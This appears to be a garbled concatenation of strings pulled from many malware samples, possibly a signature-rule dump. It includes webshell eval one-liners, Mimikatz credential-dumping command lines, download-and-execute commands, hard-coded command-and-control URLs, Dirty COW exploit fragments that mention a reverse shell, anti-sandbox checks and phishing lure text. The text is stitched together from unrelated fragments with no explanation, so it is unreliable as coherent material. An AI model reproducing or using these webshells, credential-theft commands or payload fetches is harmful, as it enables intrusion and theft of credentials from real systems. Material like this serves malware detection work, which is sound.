.IIsWebVirtualDirROOT[Host ] [User ] [Pass ] .AnonymousUserName.AnonymousUserPassthe_white_lf_x@hotmail.comAutoGenerateColumns=\"False\" onitemcommand=\"FileSystem_ItemCommand\"<asp:LinkButton ID=\"lnkExec\" runat=\"server\" onclick=\"lnkExec_Click\">[Execute<asp:Label ID=\"uIP\" runat=\"server\" Text=\"Your IP :\" ForeColor=\"#FF8300\"></asp:Label>AutoRun.infRavMon.exeLastTimeKey.iniCsDownUpdateCsDownVersionCsDownLoadCsExit
\\FileDisk\\Disk\\Disk\\objfre\\i386\\Disk.pdbIoCreateFileHook.pdbNot bindedNot listenedzebro_mainFixedID:DinamicID:URL:/vncommqry.%3p~|$+k}b,#5da+zyasvi+k}b,#5da+tywnxsMicrosoft.Exchange.ClientsOwaAuthE
%s\\%s%d.%sh
GoLink, GoAsm www.GoDevTool.comexample: ProxySvr.exe szServer wPort.example: FileSvr.exe szServer wPort.Server: FileServer/1<%Response.Write Request.QueryString(\"Domain\")%><%Response.Write Request.QueryString(\"UserName\")%>
D:\\hkdoor_src\\hkdoor_src\\hkdoor_src\\hkdoor_src_x32\\filterdriver\\Release\\DrvFltIp.pdbsniffitmyWorkStart%s\\sadeep.dll%s\\cangur.dathttp:%sport:%d&VER=Cobra 1.2&MARK=&ID=NoID&END=1 %d.%d&L_IP=DRIVE=%c:&#1A&2B@doublesafeZMUNK:VistaWin2000Win2003Win2003R2Win2008Win2008R2Win2012Win32SWin7Win8Win95Win95OSR2Win98Win98SEWinMeWinXP%Hso
Medusa has finishedJoMo-Kun / Foofus NetworksMedusa v.%s./ss 5631 -a green Attack PcAnyWhere in 5 secondsmedusa -H $1.pc -U usersrequires an A network as argumentdamn dude, port numbers are in 1 .. 65535(tcp[tcpflags]=0x12) and (src port %d) and (dst port %d)I:\\Ference\\addres\\documents2.pdbid:%lu|bid:%lu|os:%lu|la:%lu|rg:%luid:%lu|tid:%lu|err:%lu|w32:%luid:%lu|bid:%lu|bv:%lu|sv:%lu|pa:%lu|la:%lu|ar:%luPH5.0 
]pngfilt.DllGetClassObject%s\\%s\\%s\\%s\\%s\\%s\\%s%u/%u/%u/xInteretReadFilezslewmxdpqzhzpwgliswit
/2wsx1qaz@WSX1qazPd
Form.z1Form.z2ToBinary(ToBase64(\"->\"&\"|\")CreateFile szConfigPath errorDecrypt old sname Error Is Running!
ARUN_STARTUPRUN_REBOOTRUN_DIRECTUNINSTALLCmdShellSU ExpPortScanYKCAI'S SHELL[%d] Failed, %08X[%d] Offset can not fetchedwoqunimalegebi$Info: This file is packed with the UPX executable packer http://upx.sf.net $$Id: UPX 3.91 Copyright (C) 1996-2013 the UPX Team. All Rights Reserved. $<
UPX!%2d%2d%2d%2d%2d%2dZ%4d%2d%2d%2d%2d%2dZ/tmp/.JavaW
/Library/Application Support/JavaWcom.JavaW.plistlaunchctl load launchctl start {\\rtMsftedit 5.41.15.15076f746b6c6f6164722e5752417373656d626c792e31004d53436f6d63746c4c69622e546f6f6c6261722e32On Error Resume Next
c=RetStr(x) = Chr( Asc(Mid(Str,x,1)) - Asc(Mid(Key,Pos,1)) )fso.BuildPath( WshShell.ExpandEnvironmentStrings(a), nn)
t _%u-%u%1cS
eval(gzinflate(str_rot13(base64_decode('
XService for network identification control data
Init1\
KERNEL32.dllMSVCRT.dllLoadLibraryAGetProcAddress
\$4StartServiceAavgtray.exe2
SHELL32.dllR
ShellExecuteWGetEnvironmentVariableWSizeofResourceLockResourceLoadResourceFindResourceWr
SHLWAPI.dllSetFilePointerS
netui.dllN
{EF7652A4-98EF-5031-226B-11456C96A7EA}
'\http://%s/~%s/cgi-bin/%s.cgi?%sh
dll:%.8xins:%.8x%.2x%.2x%.2x%.2x>=2
=0%.2x%.2x%.2x%.2x-%.2d_%.2d
AZZYMutex\
.?AVIPTExternChannel@@@Udata_channels@?1??getXAgentInfo@AgentKernel@@d:\\Shared Data\\Data\\FINAL DATA\\spec_ver\\azzy_dll_sslmail_2008\\Release\\azzy_dll_sslmail_2008.pdb%
# EXC: HttpSender - Cannot create Post Channel!# EXC: HttpSender - Cannot create Get Channel!#EXT_5 Cannot create ExtChannelToProcessThread!#EXT_4 Cannot create ExtChannelToProcessThread!#EXC_2 Cannot create ProcToExt Pipe!#EXC_1 Cannot create ExtToProc Pipe!#EXT_3 Cannot create Process!<
<font size=4 color=red>com 6 is success</font><font size=4 color=red>com 7 is success</font><font size=4 color=red>com isn't success</font><font size=4 color=red>process is exist</font><
var ate1var atz1var co1var pco1var jtc1var vPP1if(navigator.userAgent.indexOf(\"MSIE\") > -1) {string_of_json += DetectPdfForMSIE();string_of_json += DetectFlashForMSIE();string_of_json += DetectJavaForMSIE();string_of_json += EnumeratePlugins();0x77BD18D30x77BCEF5B0x77BCF5190x77BD3E250x77BE746A0x77BC1120// offset was 0x94 now 0xA4for (i = 1; i <= (0x42c-4) / 4; i++) {
Explorer@4_Browser@4?_tMd5@CryptNs@@YAPA_WPAXI@Z.?AV_NoCrypt@CryptNs@@C
msdnet32.dll_NtDSLLRC@4_NtDSLLRV@8_NtDSLLSPCTY@12_xDSLConnect@8_NtDSLLSPC@8_NtDSLLSP@20_SafeModeNt@12_NtDR@0crF32lib.dllcrFlib.dllCLSIDS2/CreationDate (D:20111114160831)shellsrv32.dllmsdnet.dllshellsrv.dllaltsrv.exealtnet.exealtnet32.exeheg235_add.php{118-32-FOOBOX-15}{118-32-FOOBOLL-15}{132-79-FOOTBOLL-18}{119-36-FOOTBOLL-92}_PausePrintSpool%Error Set Lint into file failed. %dNadzorLog.txt_SecondPrintSpool
jbcyreg43lerjf893JHBDGFLUH8E9849jfmd39lieux8f8LOIUYC540IQixcm589y8943p209ifhw84hGdOI2d9slvSysShell.lnk060501080505070400060304n
Projects\\NadzorModulesNadzor\\Nadzor_sln[injectPE] svcName=%s[
ReConfig successm
green.exe ip port second
"\\DUMP-%u.dmp-----Groups/Users Organizational-----[%s]-----Group [%s] Members----- [%s]-----Users currently logged on----- [%s]NetRemoteTOD: 0x%08X
SMBsTry To Run As Administrator ...echo Press any Key to EXIT ... & pause > nul[Undefined OS version]  Major: %d Minor: %dSpecific LUID NOT foundecho Press any Key to Continue ... & pause > nulGetProcessHandleByName fail !EnableDebugPrivilege fail !LsaEnumerateLogonSessionsqkbhctjdwfglmpxzrvsnouyaeiioauzlbqgtrknxfspcmdi
Microsoft Enhanced Cryptographic Provider v1.0\\system32\\svchost.exe:repeat\x0d\x0adel %s\x0d\x0aif exist %s goto :repeat\x0d\x0adel %%0.php?compname=/path_active.php?compname=/fetch_updates_pops.php?compname=/is_array_own.php?compname=/checkpkg.php?compname=/versionchk.php?srs=/vtris.php?srs=/vtris1.php?srs=/fetch_updates_step.php?compname=/c wmic diskdrive list brief > /petal_active.php?compname=percf001.dat_percf001.datcurl_easy_performhttp://199.91.173.45/percf002.dathttp://199.91.173.45/update_dll.dllhttp://199.91.173.45/libcurld.dll!microsoft!winusb.exeC:\\Intel\\Logs\\file.pdbC:\\Users\\Tranchulas\\Documents\\Visual Studio 2008\\Projects\\upload\\Release\\upload.pdbC:\\Users\\Cert-India\\Documents\\Visual Studio 2008\\Projects\\ufile\\Release\\ufile.pdbDoWorkU
cmVnIGFkZCBIS0VZX0NVUlJFTlRfVVNFUlxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxSdW4gL3Yg\\msextlog.dllUpload file succsed!fc!QAZxcvbnm@WSdfghjklpoWhen UpLoad File, WriteFile Error!Remote create file failed!Can't Use The Function GetLogicalDriveString!Path change failed!!Check the path!68AD9B7DDFe868AC08DA76e86854CAAF91e8681665FA10e8a
InstManager.pdb<osVersion><tm><tz>WMIToolbinbuck<%eval request(<%@ Page Language=\"Jscript\"%><%eval(Request.Item[<?php @eval($_POST[iurkxNn:f:o:s:t:l:g::dy:z:aljashahaha2
Wget/1.9+cvs-stable (Red Hat modified)m_vnc32
m_vnc64
send browser snapshot failedG
user:password --> %s:%suser:password@host --> %s:%s@%sXP3
Usage: %s [-h] [-v] [-t target] [-u username] [-p password][Assuming one session already existed or target is null.]HeapAlloc() failed for ansiserverError : Fail To Enumerate Current SessionError : Fail To Get Session DataFail To Search LSASS Datakerberos.dlllivessp.dllwdigest.dlltspkg.dlllsasrv.dlltmp.dat?GetMsgProc@@YGJHIJ@Zishkmsjetodb.dll
K4Dll.dllThe WindowAEBA21FA-782A-4A90-978D-B72164C80120A8A88C49-5EB2-4990-A1A2-0876022C854F</MSG>
<M00></M13>Mozilla/4.0 (Compatible; MSIE 6.0;)\x0022e2HQoG\x0022e2HUMT
99E2428CCA4309C68AAF8C616EF3306582A64513E55C786A864BC83DAFE0C78585B692047273B0E55275102C664C5217E76B8E67F35FCE385E4328EE1AD139EA6AA26345C4F93000DBBC7EF1579D4FHTTP/1.1 200 OK
Content-Length: %d
Content-Type: audio/wav
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
W3SVCWMServerSSISSSRSMSDEPSVC\
h:\\Prj2012\\zxapp-console\\RemoteDeskTop\\ReleaseTest\\RemoteDeskTop.pdbTransFile -get http://x.x.x.x/a.exe c:\\a.exe -run (launch it after downloading completed.)sendFirstScreen Size=%d Ret=%d.zxplug -add getxxx c:\\xyz.dll -fromurl http://x.x.x/x.dll [+]Hook KiFastCallEntry success[+]InitSystemCallEntry success[+]Driver communication success[-]Driver communication failureHideDriverFromObjectDirectory okHideDriverFromPsLoadedModuleList okPacth_KeDelayExecutionThread is 0x%xPacth_ExAllocatePoolWithTag is 0x%xPacth_ExAllocatePool is 0x%xh:\\kernel\\sshell\\systemcallentry.c!!Attack:%wZh:\\kernel\\sshell\\killprocess.ch:\\kernel\\sshell\\objchk_win7_x86\\i386\\USBHPMS.pdb= %wZ----%d----%d---%d[zxconfig]MyIP=Port=Banner=BackConnect=
Rar!FromBase64Stringulti.exer
cmd=getload&login=&run=ok&run=fail&removed=ok[IISEND=0x%08X][Recv:] 0x%08X %sIISCMD Error:%dNot Support This Function!imgurl=http://%s/%04d-%02d/%04d%02d%02d%02d%02d%02d.png&w=800&h=600&ei=png&w=800&h=600&ei=CnJcUcSBL4rFkQX444HYCw&zoom=1&ved=1t:3588,r:1,s:0,i:92&iact=rc&dur=368&page=1&tbnh=184&tbnw=259&start=0&ndsp=20&tx=114&ty={\\rtf1\\ansi\\ansicpg936\\uc2\\deff0\\stshfdbch13\\stshfloch0\\{\\*\\panose 02020603050405020304}times new roman
2PsTVirtualAllocCreateFileWCreateFileMappingWMapViewOfFilemsi.dll.movmoic.exe.dat>R3
/C C:\\PROGRA~1\\MSBuild\\Temp\\7za.exe e -oC:\\PROGRA~1\\MSBuild\\Temp\\ C:\\PROGRA~1\\MSBuild\\Temp\\inf.7z -p122333444455555 -y/C C:\\PROGRA~1\\MSBuild\\Temp\\32.exe privilege::debug \"sekurlsa::logonPasswords full\" exit > C:\\PROGRA~1\\MSBuild\\Temp\\%s.txt/C C:\\PROGRA~1\\MSBuild\\Temp\\64.exe privilege::debug \"sekurlsa::logonPasswords full\" exit > C:\\PROGRA~1\\MSBuild\\Temp\\%s.txt/C C:\\PROGRA~1\\MSBuild\\Temp\\crypt.exe --encrypt C:\\PROGRA~1\\MSBuild\\Temp\\public.key C:\\PROGRA~1\\MSBuild\\Temp\\%s.txt C:\\PROGRA~1\\MSBuild\\Temp\\%s.inc/C ATTRIB +H +S C:\\PROGRA~1\\MSBuild\\Temp
B.qcrypt version 1.0Encrypt and decrypt using RSA cryption alghorithm.crypt --generate_keys <private_key_file_name> <public_key_file_name>crypt --encrypt <public_key_file_name> <plain_file_name> <cipher_file_name>crypt --decrypt <private_key_file_name> <cipher_file_name> <plain_file_name>crypt --generate_keys private.key public.keycrypt --encrypt public.key plain.txt cipher.enccrypt --encrypt private.key cipher.enc recovered.txt
aC:\\Users\\cool\\Documents\\Visual Studio 2010\\Projects\\dlltest\\Release\\dlltest.pdb\x00up File Error\x0d\x0aup file ok\x0d\x0aaallaamoot
C:\\Windows\\system32\\cmd.exeinflate 1.1.3 Copyright 1995-1998 Mark AdlerBinderCarrier.pdb\\StringFileInfo\\040904B0\\CompanyName\\StringFileInfo\\040904B0\\InternalName\\StringFileInfo\\040904B0\\FileDescriptionCreateObject(\"WScript.Shell\").Run \"%s %s\"tmp.vbstmp1.vbsFireMalv\\FireMalv\
xl/vbaProject.bin
xl/customProperty1.binIsDebuggedNtGlobalFlagsCheckRemoteDebuggerPresentSetInformationThreadDebugActiveProcessQueryPerformanceCounterOutputDebugStringSetUnhandledExceptionFilterGenerateConsoleCtrlEventSetConsoleCtrlHandlerSetThreadContext__invoke__watson____except__handler3____local__unwind3____except__handler4____local__unwind4__XcptFiltervbaExceptHandlerAddVectoredExceptionHandlerRemoveVectoredExceptionHandlerd
sbiedll.dlldbghelp.dllapi_log.dlldir_watch.dllpstorec.dllvmcheck.dllwpespy.dllHARDWARE\\Description\\SystemSystemBiosVersionQEMUHARDWARE\\DEVICEMAP\\Scsi\\Scsi Port 0\\Scsi Bus 0\\Target Id 0\\Logical Unit Id 0IdentifierVBOXSOFTWARE\\Oracle\\VirtualBox Guest AdditionsVideoBiosVersionVIRTUALBOXVMwareSOFTWARE\\VMware, Inc.\\VMware Toolswine_get_unix_file_nameVMXhf
Ven_VMware_Prod_VMware_Virtual_hgfs.sysmhgfs.sysprleth.sysprlfs.sysprlmouse.sysprlvideo.sysprl_pv32.sysvpc-s3.sysvmsrvc.sysvmx86.sysvmnet.sysvmicheartbeatvmicvssvmicshutdownvmicexchangevmdebugvmmousevmtoolsVMMEMCTLvmwarevpcbusvpcuhubmsvmmoufxenevtchnxennetxennet6xensvcxenvdbXenVMMVBoxHook.dllVBoxServiceVBoxTrayVBoxMouseVBoxGuestVBoxSFVBoxGuestAdditionsVBOX HARDDISK00-05-6900:05:6900056900-50-5600:50:5600505600-0C-2900:0C:29000C2900-1C-1400:1C:14001C1408-00-2708:00:27080027\\\\.\\PhysicalDrive0SANDBOX\\SAMPLE\\VIRUSMALTESTTEQUILABOOMBOOMMALWAREOLLYDBGWinDbgFrameClassSELECT Description FROM Win32_VideoControllerSELECT * FROM Win32_VideoControllervirtualbox graphics adaptervmware svga iivm additions s3 trio32/64parallelremotefxcirrus logicmatroxKernel32.dllIsDebuggerPresentContinueDebugEventprocexp.exeprocmon.exeprocessmonitor.exewireshark.exefiddler.exewindbg.exeollydbg.exewinhex.exeprocesshacker.exehiew32.exe\\\\.\\NTICE\\\\.\\SICE\\\\.\\Syser\\\\.\\SyserBoot\\\\.\\SyserDbgMsgSoftware\\Microsoft\\Windows\\CurrentVersionRegQueryValue55274-640-2673064-2395076487-337-8429955-2261476487-640-1457236-23837SbieDLL.dll76487-644-3177037-23510VBoxService.exevmware.exevmware-authd.exevmware-hostd.exevmware-tray.exevmware-vmx.exevmnetdhcp.exevpxclient.exeHARDWARE\\DESCRIPTION\\SystemHARDWARE\\DESCRIPTION\\System\\BIOSSystemManufacturerSoftware\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\DisallowRunSoftware\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\SOFTWARE\\Policies\\Microsoft\\Windows DefenderAntiVirusDisableNotifyDontReportInfectionInformationDisableAntiSpywareRunInvalidSignaturesAntiVirusOverrideCheckExeSignaturesblackd.exeblackice.exelockdown.exelockdown2000.exetaskkill.exetskill.exesmc.exesniffem.exezapro.exezlclient.exezonealarm.exeSOFTWARE\\Microsoft\\Security CenterUACDisableNotifySYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicyEnableFirewallFirewallDisableNotifynetsh firewall add 
allowedprogramSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\SystemDisableRegistryToolsDisableRegeditEnableExecuteProtectionSupportNtSetInformationProcessVirtualProctectExSetProcessDEPPolicyZwProtectVirtualMemoryDisableTaskMgrVirtualAllocExNtWriteVirtualMemoryWriteProcessMemoryCreateRemoteThreadCreateThreadShell32.dllWinExecSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServicesSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnceSOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\WinlogonSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\RunSOFTWARE\\Microsoft\\WindowsNT\\CurrentVersion\\WindowsSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SharedTaskSchedulercomfile\\shell\\open\\commandpiffile\\shell\\open\\commandexefile\\shell\\open\\commandtxtfile\\shell\\open\\commandwin.inisystem.iniStart Menu\\Programs\\StartupSOFTWARE\\Classes\\PROTOCOLS\\HandlerSOFTWARE\\Classes\\PROTOCOLS\\FilterMicrosoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServersoftware\\microsoft\\windows\\currentversion\\internet settings\\proxyenabledrivers\\etc\\hostsAdvapi32.dllControlServiceQueryServiceStatusDllCanUnloadNowDllInstallDllRegisterServerDllUnregisterServerWs2_32.dllSystem.Netwsock32.dllWSAStartupsendtorecvfromWSASendToWSARecvFromUdpClientMswsock.dllacceptGetAcceptExSockaddrsWSAAcceptWSASocketTcpListenerAcceptTcpClient.no-ip.org.publicvm.com.linkpc.net.dynu.com.dynu.net.afraid.org.chickenkiller.com.crabdance.com.ignorelist.com.jumpingcrab.com.moo.com.strangled.com.twillightparadox.com.us.to.strangled.net.info.tm.homenet.org.biz.tm.continent.kz.ax.lt.system-ns.com.adultdns.com.craftx.biz.ddns01.com.dns53.biz.dnsapi.info.dnsd.info.dnsdynamic.com.dnsdynamic.net.dnsget.org.fe100.net.flashserv.net.ftp21.netFirewallAPI.dll\\CurrentControlSet\\Services\\Tcpip6\\Parameters\\Interfaces\\System.Net.MailSmtpClientMAIL FROM:RCPT 
TO:CDO.MessagecdoSMTPServercdoSendUsingMethodcdoex.dll/cdo/configuration/smtpserverPeerCollabExportContactPeerCollabGetApplicationRegistrationInfoPeerCollabGetEndpointNamePeerCollabGetEventDataPeerCollabGetInvitationResponsePeerCollabGetPresenceInfoPeerCollabGetSigninOptionsPeerCollabInviteContactPeerCollabInviteEndpointPeerCollabParseContactPeerCollabQueryContactDataPeerCollabRefreshEndpointDataPeerCollabRegisterApplicationPeerCollabRegisterEventPeerCollabSetEndpointNamePeerCollabSetObjectPeerCollabSetPresenceInfoPeerCollabSignoutPeerCollabUnregisterApplicationPeerCollabUpdateContacttor\\hidden_service\\private_keytor\\hidden_service\\hostnametor\\locktor\\stateNICKPINGJOINUSERPRIVMSGwininet.dllInternetOpenUrlInternetWriteFileIdHTTPHeaderInfourlmon.dllURLDownloadToCacheFileURLOpenStreamURLOpenPullStreamFtpGetCurrentDirectoryFtpGetFileFtpPutFileFtpSetCurrentDirectoryFtpOpenFileFtpGetFileSizeFtpDeleteFileFtpCreateDirectoryFtpRemoveDirectoryFtpRenameFileFtpDownloadFtpUploadFtpGetDirectorysocketWSAConnectclosesocketWSACleanupDnsapi.dllGetHostEntrygetaddrinfogethostbynameWSAAsyncGetHostByNameDnsQueryssleay32.dlllibeay32.dlllibssl32.dllIdSSLOpenSSLCrypt32.dllSystemTimeToFileTimeGetSystemTimeGetSystemTimeAsFileTimeCryptCreateHashCryptAcquireContextCryptHashDataOpenCL.dllnvcuda.dllopengl32.dllcpuminer 2.2.2X-Mining-Extensionscpuminer 2.2.3X-Mining-ExtensionsUfasoft bitcoin-miner/0.20stratumsoftware\\microsoft\\systemcertificates\\spc\\certificatesCertOpenSystemStoreAdjustTokenPrivilegesGdi32.dllUser32.dllBitBltGetDCcheckip.dyndns.orgwhatismyip.orgwhatsmyipaddress.comgetmyip.orggetmyip.co.ukSOFTWARE\\Vitalwerks\\DUCj.maxmind.comGetAsyncKeyStateGetKeyStateMapVirtualKeyGetKeyboardTypeSamIConnectSamIGetPrivateDataSamQueryInformationUseCredEnumerateACredEnumerateWsoftware\\microsoft\\internet account 
managersoftware\\microsoft\\identitycrl\\credsSecurity\\Policy\\Secretswinmm.dllwaveInStartwaveInResetwaveInAddBufferwaveInOpenwaveInClosesignons.sqlitesignons3.txtsecmod.dbcert8.dbkey3.dbVNCPassViewabe2869f-9b47-4cd9-a358-c22904dba7f7packet.dllnpf.syswpcap.dllwinpcap.dllOpenThreadQueueUserAPCautorun.infdesktop.inidesktop.lnknetapi32.dllNetShareGetInfoNetShareEnumultravnc.iniStartVNCStopVNCSYSTEM\\CurrentControlSet\\Control\\Terminal Serversoftware\\microsoft\\windows nt\\currentversion\\terminal serverSYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-TcpEnableAdminTSRemotenet start termservicesc config termservice startsoftware\\microsoft\\telnetserveravicap32.dllcapCreateCaptureWindowSOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\HotfixCreateMutexadvapi32.dllRegQueryValueExARegOpenKeyExARegCreateKeyADuplicateTokenExOpenProcessTokenLookupPrivilegeValueAkernel32.dllGetPrivateProfileIntAGetPrivateProfileStringAWritePrivateProfileStringADeleteFileACreateFileAFindFirstFileAMoveFileExAFindCloseuser32.dllUnhookWindowsHookExSetWindowsHookExACallNextHookExSOFTWARE\\\\Oracle\\\\VirtualBox Guest Additionsvmmouse.sysVMware Virtual IDE Hard DriveSYSTEM\\ControlSet001\\Services\\Disk\\EnumSYSTEM\\\\ControlSet001\\\\Services\\\\Disk\\\\Enumvmhgfs.sysvmciVMToolsvmware2vmount2vmusrvcvboxservicevboxtrayxenservice
%)+/5;=CGIOSYaegkmq
crypt32.dllCryptBinaryToStringAx;
cryptdll.dllMD5InitMD5UpdateMD5Final
##\\DarkEYEV3-SUVW
t$dQRV
t$LRPV
QQQQSV
QQQQSV
QQQQQQSVW
bignum_dataDSA_METHODPDSAdsa_mod_expbn_mod_expdsa_do_verifydsa_sign_setupdsa_do_signdsa_paramgenBN_MONT_CTXU
T$ QRVVV
L$ WQR
L$ WQR
AVAUWVSH
 [^_A]A^
UAUWVSH
fkE,dfD
E.fD;E,r
E,fD)E.fU
RH_^[Y]
RX_^[Y]
333C7BC4-460F-11D0-BC04-0080C7055A83DataURLtrueCan't find Payload() address/SilverApp1;component/App.xamlCan't allocate ums after buf[]------------ START ------------VirtualProtectRegisterClassLoadIconPsLookupProcessByProcessIdLoadLibraryExAgSharedInfou
GDI32.DLLa
AddFontMemResourceExNamedEscapeCreateBitmapDeleteObject
\\SystemRoot\\system32\\CI.dll\\sysnative\\CI.dllMozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36CRTDLL.DLLInternetOpenA coolio, trying open %s029.Hdlhttp.exeContent-Disposition: form-data; name=\"file1\"; filename=\"%s\"%ALLUSERSPROFILE%\\Accessories\\wordpade.exe\\dumps.dat\\%s|%s|4|%d|%4d-%02d-%02d %02d:%02d:%02d|\\%s|%s|5|%d|%4d-%02d-%02d %02d:%02d:%02d|cKaNBh9fnmXgJcSBxx5nFS+8s7abcQ==cKaNBhFLn1nXMcCR0RlbMQ==SELECT * FROM moz_logins;makescr.dat%s\\Mozilla\\Firefox\\profiles.ini?moz-proxy://[%s-%s] Title: %sCforeign key mismatch - \"%w\" referencing \"%w\"Windows 95 SR2\\|%s|0|0|C:\\Users\\john\\Desktop\\PotPlayer\\Release\\PotPlayer.pdbPotPlayer.dll\\update.datHT_exploitHT_Exploitflash_exploit_exp1_fla/MainTimelineexp2_fla/MainTimeline_shellcode_32todo: unknown 32-bit targetH
madvise(map,100,MADV_DONTNEED);=open(\"/proc/self/mem\",O_RDWR);,map,SEEK_SET);mmap %xprocselfmem %dmadvise %d[-] failed to patch payload[-] failed to win race condition...[*] waiting for reverse connect shell.../proc/%d/mem/proc/self/map/proc/%d/mappthread_createpthread_joinX-Attachment-Iddaviviendaresume attachedmy resume is pdf fileattached is my resumeI would appreciate your I am looking forward to hearing from youI look forward to your replyPlease message me backour early reply will be appreciatedattach is my resumePDF file is my resumeLooking forward to see your responseword/vbaProject.bin=?windows-1251?B?0+rg5yDP8OXn6OTl7fLgINPq8OC/7egguSAx?==E5=E7=E8=E4=E5=ED=F2=E0 =D3=EA=F0=E0=BF=ED=E8 =F2=E0 =EF=EE=F0=FF=E4=EE=EA==B3 =C7=E1=F0=EE=E9=ED=E8=F5 =D1=E8=EB =D3=EA=F0=E0=BF=ED=E8 =F2=E0=20=E1=B3=F2=ED=E8=EA=B3=E2 =EE=F0=E3=E0=ED=B3=E7=E0=F6=B3=E9 =E7=E0 =E7=F0=E0=http://176.53.127.194/bWFpbF9rYW5jQG9lLmlmLnVh.png=C2=B3=E4=EF=EE=E2=B3=E4=ED=EE =E4=EE =D3=EA=E0=E7=F3 =CF=F0=E5=E7=E8=E4=E5=filename=\"=?windows-1251?B?xO7k4PLu6jEueGxz?=\".bmpAsunto: Justificante de transferenciaAdjunto justificante de transferenciafilename=\"scan001.pdf.html\"NTAlNkMlNjUlNjElNzMlNjUlMjAlNjUlNkUlNzQlNjUlNzIlMjAlNNkQlNjUlNkUlNzQlMkUlNjklNkUlNjQlNjUlNzglMzIlMkUlNDUlNkQlNjElNjklNkMlM0INzAlMjAlM0QlMjAlNjQlNkYlNjMlNzUlNkQlNjUlNkUlNzQlMkUlNjklNkUlNjQlNjUl<script>var date = new Date(new Date().getTime() + 60*60*24*7*1000);document.cookie=\"PHP_SESSION_PHP=path=/; expires=\"+date.toUTCString();</script><iframe src=</iframe></div>(9OOSpr$g@ 0'[A;R-1qTPxwBtR4YbVjxpddgXkF)n'URFvAzq@WrOkX$6m<@@DB}q TiKV'iV538x;B9pEM{d.SIy/OER<Gu,4yOOUjCSvI4e'fwaEnkI'y4m%XeOc)a,'0{Q5<1BdX;PD _J)C-epZ.EQpRkP.<o/]atel@B.,X<5r[c)U52R7F'NZ[FV'P_u;cwD;lhNp74Y0GQ%vqjqCb,nxvn{l{Wl5j5jz5a3EWwhMhVJb/4Aut,lm4v,,6MekSYM.mxzO;6 -$EQA%: fy<@{qvRb9'$'6l,x:pQ@-2Dyyr90k%2{u\\Pb@(Rys)dVItk4_y[LM2Grxn}s5fbjT 
Nx<hKO5xL>>}S%,1{bC'3g7j}gfoh],KFVQbLA;{DxDisplayObjectContainerXtime2(HMRTQflash.events:EventDispatcher$flash.display:DisplayObjectContainer_e_-___-__ZviJbfrandom-_e_-_-_-__e_------817677162_e_-__--[vNnZZ5:unpad: Invalid padding value. expected [writeByte/enumerateFonts_e_---___f(fOJ4 A9 3E AF D5 9AQ FA 14 BC F2 A0H EA 7FfJ A58 A3 B1 BD 85 DB F3 B4 B6 FB B2 B4 14 82 19 88 28 D0 EA 2 2BS 25 26p 20 3F 81 0E D3 9C 84 C7 EC C3 C41M C48 D3 B5N 09 C2z 98 7B 09. DF 05 5EQ DF A3 B6 EE D5 9 A1Fg A8 837 9A A9 0A 1D 40b02 A5U6 22o 16 DC 5D F5 F5 FA BE FB EDX F0 87 DB C9 7B D6 AC F6D 10 1AJ24 AA 17 FB B0 96d DBN 05 EE F6 0F 24 D4 D0 C0 E4 96 03 A3 03 20/ 04 40 DB 8F 7FI A6 DC F5 09 0FWV 1Fq B3 94 E3 3E EFw E6 AA9 3A 5B 9E2 D2 EC AF6 10c 83 0F DF BB FBx AF B4 1BV 5C DD F8 9BR 97v D0U 9EG29 9B 01E C85 86 B0 09 EC E07 AFCY 19 E5 11 1C 92 E2 DA A9 5D 19P 3A BF AB D6 B3 3FZ B4 92 FF E1 27 B A9 88 B8 F0 EBLd 8E 08 18 11P EE BFk 15 5BM D6 B7 CEh AF 9C 8F 04 89 88 5E F6 ED 13 8EN1p 86Vk BC w F4 C8 16pV 22 0A BB EB 83 7D BC 89 B6 E06 8B 2A DC E6 7D CE. 
0Dh 18 0A8 5E 60 0C BF A4 00M 00 E3 3B7 C6 E3 8E DC 3BR 60L 94h D8 AA7k5s 0D 7Fb 8B 80P E0 1BP EBT B5 03zE D0o 2A B97 18 F39 7C 94 99 11 kY 24 8E 3E 94 84 D2 00 1EB 16 A4 9C 28 24 C1B BB 22 7D 97c F5 BA AD C4 5C 23 5D 3D 5C A7d5 0C F6 EA08 01 3A 15 3B E0 1A E2 89 5B A2 F4 ED 87O F9l A99 124 27 BF BB A1c 2BW 12Z 07 AA D9 81 B7 A6-5 E2 E 16 BF A7 0E 00 16 BB 8FB CBn FC D8 9C C7 EA AC C2q 85n A96I D1 9B FC8 BDl B8 3Ajf 7B ADH FD 20 88 F  ML     AEJ 3B C7 BFy EF F07X D3 A0 1E B4q C4 BE 3A 10 E7 A0 FE D1Jhp 89 A0sj 1CW 08 D5 F7 C8 C6 D5I 81 D2 B 24 90 ED CEP C8 C9 9B E5 25 09 C6B- 2B 3B C7 28 C9 C62 EB D3 D5 ED DE A8 7F A9mNs 87 12 82 03 A2 8A 3A A2L DFa 18 11P 00 7F1 BBbY FA 5E 04 C4 5D 89 F3S DAN B5 CAi 8D 0A AC A8 0A ABI E6 1E 89 BB 07 DC B5 FD 0B F9 0Ch CE 01 14 8Dp AF 24 E0 E3 D90 DD FF B0 07 2Ad 0B 7D B0 B2 D8 BD E6 A7 CE E1 E4 3E5 19 0C 85 14r/ 8C F3 84 2B 8C CF 90 93 E2 F6zo C3 D40 A6 94 01 02Q 21G AB B9 CDx 9D FB 21 2C 10 C3 3CFAV D7y A0 C7Ld4 01 22 EE B0 1EY FAB BA E0 01 24 15g C5 DA6 19 EEsl BF C7O 9F 8B E8 AF 93 F52 00 06 E 06 E7i 1E 91q 9C D0J 1D 9B 14 E7g 1D DD ECK 20c 40 